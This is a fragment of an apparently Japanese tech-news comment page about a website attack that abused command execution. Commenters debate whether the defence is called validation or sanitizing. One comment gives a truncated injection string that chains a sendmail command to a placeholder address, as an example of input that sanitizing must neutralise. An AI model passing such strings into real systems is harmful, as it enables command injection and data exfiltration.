アカウント名:
パスワード:
これまでのサイト攻撃は、OSの不備やホームページをネットに提供するプログラムのミスなどを突くケースが多かった。今回は、プログラムに欠陥がなくても、コンピューターが正規の命令か悪意のある命令かは判断できない点を突き、命令をそのまま実行させて支配下に置いていた。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
普通のやつらの下を行け -- バッドノウハウ専門家
プログラムに欠陥がなくても? (スコア:2, すばらしい洞察)
Re:プログラムに欠陥がなくても? (スコア:2, 興味深い)
Re:プログラムに欠陥がなくても? (スコア:1)
バリデーションというよりもサイニタイジングと言わないか?
俺のまわりだけか・・。
バリデーション=数値範囲チェック、仕様に添った型で有るか
サニタイジング="aaa && sendmail hoge@hoge `tail
サニタイジング=無害化 (スコア:0)
価格が実際のところどちらを採用したのかは知らない。